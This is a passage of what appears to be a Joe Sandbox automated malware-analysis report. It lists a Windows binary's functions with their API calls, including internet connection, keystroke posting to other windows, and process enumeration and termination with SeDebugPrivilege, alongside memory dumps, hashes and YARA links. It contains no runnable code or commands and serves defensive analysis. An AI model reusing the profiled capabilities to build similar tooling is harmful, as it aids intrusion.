                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002F5CB8
                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002F5CEB
                                                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 002F5D25
                                                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 002F5D34
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3210457359-0
                                                                                                                                                                        • Opcode ID: 7476b92455188507941edae7224c9e9950a6e2e6718ca378c932d92e87b8e4f9
                                                                                                                                                                        • Instruction ID: cb95b585c7941dbbcaae34114d9bc95412cdb47a5a5c9fe070283ad63243223b
                                                                                                                                                                        • Opcode Fuzzy Hash: 7476b92455188507941edae7224c9e9950a6e2e6718ca378c932d92e87b8e4f9
                                                                                                                                                                        • Instruction Fuzzy Hash: 5351A030671A2DBFEF249F54CC49BB8BBA5AB047A4F144132F7159A1E0C7B1A9A0DF40
                                                                                                                                                                        Function 002DCB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002DCBC7
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002DCBDA
                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 002DCBEE
                                                                                                                                                                          • Part of subcall function 002DCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002DCCB7
                                                                                                                                                                          • Part of subcall function 002DCC98: GetLastError.KERNEL32 ref: 002DCD67
                                                                                                                                                                          • Part of subcall function 002DCC98: SetEvent.KERNEL32(?), ref: 002DCD7B
                                                                                                                                                                          • Part of subcall function 002DCC98: InternetCloseHandle.WININET(00000000), ref: 002DCD86
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 337547030-0
                                                                                                                                                                        • Opcode ID: 8b46aeab0f78c3514901b5bd9225f155adc937096d6bd04ed8af65678370d854
                                                                                                                                                                        • Instruction ID: dc56a74e6f8005c213b29ff64710340e9c1f8323d2327d464f29d5166f9e5b20
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b46aeab0f78c3514901b5bd9225f155adc937096d6bd04ed8af65678370d854
                                                                                                                                                                        • Instruction Fuzzy Hash: 06318F71120702AFCB219F65DD48A7ABBA9FF08354B20452FFA5A86710C731EC24EB60
                                                                                                                                                                        Function 002C2EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002C43AD
                                                                                                                                                                          • Part of subcall function 002C4393: GetCurrentThreadId.KERNEL32 ref: 002C43B4
                                                                                                                                                                          • Part of subcall function 002C4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002C2F00), ref: 002C43BB
                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 002C2F0A
                                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002C2F28
                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002C2F2C
                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 002C2F36
                                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002C2F4E
                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 002C2F52
                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 002C2F5C
                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002C2F70
                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 002C2F74
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                                                        • Opcode ID: b1e656faae621d60107600b3c3ec2cd8553e584251a4c8c9c94e35ea6d3536ed
                                                                                                                                                                        • Instruction ID: ff11115fd401f74cb3d341aa95f09e8ab22a4fe130786f19e727c1c81fea3e1d
                                                                                                                                                                        • Opcode Fuzzy Hash: b1e656faae621d60107600b3c3ec2cd8553e584251a4c8c9c94e35ea6d3536ed
                                                                                                                                                                        • Instruction Fuzzy Hash: E501D830794214BBFB106768AC8EF6A3F5ADB5DB61F100025F318AF1E0C9E15454CEA9
                                                                                                                                                                        Function 002C2150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,002C1D95,?,?,00000000), ref: 002C2159
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,002C1D95,?,?,00000000), ref: 002C2160
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002C1D95,?,?,00000000), ref: 002C2175
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,002C1D95,?,?,00000000), ref: 002C217D
                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,002C1D95,?,?,00000000), ref: 002C2180
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002C1D95,?,?,00000000), ref: 002C2190
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(002C1D95,00000000,?,002C1D95,?,?,00000000), ref: 002C2198
                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,002C1D95,?,?,00000000), ref: 002C219B
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,002C21C1,00000000,00000000,00000000), ref: 002C21B5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1957940570-0
                                                                                                                                                                        • Opcode ID: 51b0b74df808cf4b1d37996fbbcb818ca46e4d417a0af01a9245a23e5a6b4c38
                                                                                                                                                                        • Instruction ID: 9fa78e2f14369f8cd1ab1386fbc9ce762e4ef8434aef387d74817e00586f6777
                                                                                                                                                                        • Opcode Fuzzy Hash: 51b0b74df808cf4b1d37996fbbcb818ca46e4d417a0af01a9245a23e5a6b4c38
                                                                                                                                                                        • Instruction Fuzzy Hash: 1201BFB5240308BFE710AF65EC4DF6B7BADEB89751F004421FA05DB1A1CA709814CB20
                                                                                                                                                                        Function 002CCE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002641EA: _wcslen.LIBCMT ref: 002641EF
                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002CCF99
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CCFE0
                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002CD047
                                                                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002CD075
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                        • String ID: ,*3$0$<*3
                                                                                                                                                                        • API String ID: 1227352736-2625098317
                                                                                                                                                                        • Opcode ID: d2eee50d6a49358c63badd62bf27ad4e5112eefec8bde0c180c8fce012725308
                                                                                                                                                                        • Instruction ID: 7c08bb16db5b380eda6aea3049c5e2a6543557390d5be8f8d2ad0e70acbb08e4
                                                                                                                                                                        • Opcode Fuzzy Hash: d2eee50d6a49358c63badd62bf27ad4e5112eefec8bde0c180c8fce012725308
                                                                                                                                                                        • Instruction Fuzzy Hash: 3051DF716243029BD715AF28C885F6BB7E8AF45324F040B3EF999D22D1DBB0C965CB52
                                                                                                                                                                        Function 002EAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002CDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 002CDDAC
                                                                                                                                                                          • Part of subcall function 002CDD87: Process32FirstW.KERNEL32(00000000,?), ref: 002CDDBA
                                                                                                                                                                          • Part of subcall function 002CDD87: CloseHandle.KERNEL32(00000000), ref: 002CDE87
                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002EABCA
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002EABDD
                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002EAC10
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 002EACC5
                                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 002EACD0
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002EAD21
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                                                                        • Opcode ID: 39e12e07f3350d76a7e60314751e182c1f307d41efd982b398120038463d332f
                                                                                                                                                                        • Instruction ID: f0092af5809d8e51b65a1cd4e224c99c2c83e62e5a915306f5b4c02236a5a17a
                                                                                                                                                                        • Opcode Fuzzy Hash: 39e12e07f3350d76a7e60314751e182c1f307d41efd982b398120038463d332f
                                                                                                                                                                        • Instruction Fuzzy Hash: 8361BE742242829FD710DF19C894F25BBE1AF54318F58849CE4664BBA3C771FC99CB92
                                                                                                                                                                        Function 002F4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002F43C1
                                                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 002F43D6
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002F43F0
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F4435
                                                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 002F4462
                                                                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002F4490
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Window_wcslen
                                                                                                                                                                        • String ID: SysListView32
                                                                                                                                                                        • API String ID: 2147712094-78025650
                                                                                                                                                                        • Opcode ID: 930d738be03bcadab900ab3b859d9036ffbb612f10e1d012df2de2984944f615
                                                                                                                                                                        • Instruction ID: 583d4a5f7dd03ea9cf496ba6d51360122dd2d7b3acd5f821a79842bef917dde4
                                                                                                                                                                        • Opcode Fuzzy Hash: 930d738be03bcadab900ab3b859d9036ffbb612f10e1d012df2de2984944f615
                                                                                                                                                                        • Instruction Fuzzy Hash: D841B23191031DABDB11AF64DC49BEBB7A9EB08390F100126FA14E7291D7B099A0CB90
                                                                                                                                                                        Function 002CC625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002CC6C4
                                                                                                                                                                        • IsMenu.USER32(00000000), ref: 002CC6E4
                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 002CC71A
                                                                                                                                                                        • GetMenuItemCount.USER32(017160F8), ref: 002CC76B
                                                                                                                                                                        • InsertMenuItemW.USER32(017160F8,?,00000001,00000030), ref: 002CC793
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                        • String ID: 0$2
                                                                                                                                                                        • API String ID: 93392585-3793063076
                                                                                                                                                                        • Opcode ID: 86719032eed546bc3dee94ed73a4c51fd1155ca235242ff4380f8c41c71749a7
                                                                                                                                                                        • Instruction ID: c745ac6092b680faad7ade3ce7d6c574a23ea83ccda6ce844b806951638da146
                                                                                                                                                                        • Opcode Fuzzy Hash: 86719032eed546bc3dee94ed73a4c51fd1155ca235242ff4380f8c41c71749a7
                                                                                                                                                                        • Instruction Fuzzy Hash: F0519E706102069BDF10CF68D988FAEBBF9EF44314F34426EE819A7291D3709959CF51
                                                                                                                                                                        Function 002619CD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121keyboardCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 002619E1
                                                                                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 002619FE
                                                                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00261A23
                                                                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00261A3D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                        • String ID: $'&$$'&
                                                                                                                                                                        • API String ID: 4210589936-3932867606
                                                                                                                                                                        • Opcode ID: 3a4a505dd2b2cf56e8eb47477359063f85441874f3d42e64914c5334572a9a9c
                                                                                                                                                                        • Instruction ID: e41359b97dd4085ee17c02a4b5264fbf612f21ff17575df279c07243cfdf3444
                                                                                                                                                                        • Opcode Fuzzy Hash: 3a4a505dd2b2cf56e8eb47477359063f85441874f3d42e64914c5334572a9a9c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8D415E75A1410AABDF15DFA4C844AFEB775FB05364F248225E429A2290CB706EA4CF91
                                                                                                                                                                        Function 00261B00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • BeginPaint.USER32(?,?,?), ref: 00261B35
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00261B99
                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00261BB6
                                                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00261BC7
                                                                                                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00261C15
                                                                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002A3287
                                                                                                                                                                          • Part of subcall function 00261C2D: BeginPath.GDI32(00000000), ref: 00261C4B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 3050599898-113007392
                                                                                                                                                                        • Opcode ID: c05af53d2e37e6038707de8c3f013d03095603215a698c3192d7f4708de79904
                                                                                                                                                                        • Instruction ID: a8ef00186feab5265eee41eb275be441e3b2a964d87ad5707d0ea841a0b20b60
                                                                                                                                                                        • Opcode Fuzzy Hash: c05af53d2e37e6038707de8c3f013d03095603215a698c3192d7f4708de79904
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F41BE30114301AFD721DF24ECC8FBB7BA8EB46324F040669FA54862A1C771ADA4DB62
                                                                                                                                                                        Function 002F86FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 002F8740
                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 002F8765
                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002F877D
                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 002F87A6
                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002DC1F2,00000000), ref: 002F87C6
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 002F87B1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 2294984445-113007392
                                                                                                                                                                        • Opcode ID: e0cb9019474b2ea2d64c6cf4591ce967d5737772e9bc0eb6bc5003f22b563200
                                                                                                                                                                        • Instruction ID: 9cb072bd502904d032e3ff474a6c06006f2038046ea264e67733d76238f88f7d
                                                                                                                                                                        • Opcode Fuzzy Hash: e0cb9019474b2ea2d64c6cf4591ce967d5737772e9bc0eb6bc5003f22b563200
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E2186755202469FCB14AF38DC48B7AF7A5EB453B5F254639FA26D61E0EF309860CB10
                                                                                                                                                                        Function 002CD11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 002CD1BE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: IconLoad
                                                                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                                                                        • Opcode ID: 91ac2fb709183e5a1639e2625a78f9221d8311fbda42da16858d29b32eb15915
                                                                                                                                                                        • Instruction ID: 79ccd6bff356c10583aa1e83b9ce3a0266f82fa3b1c11c17ea14b8a23993136d
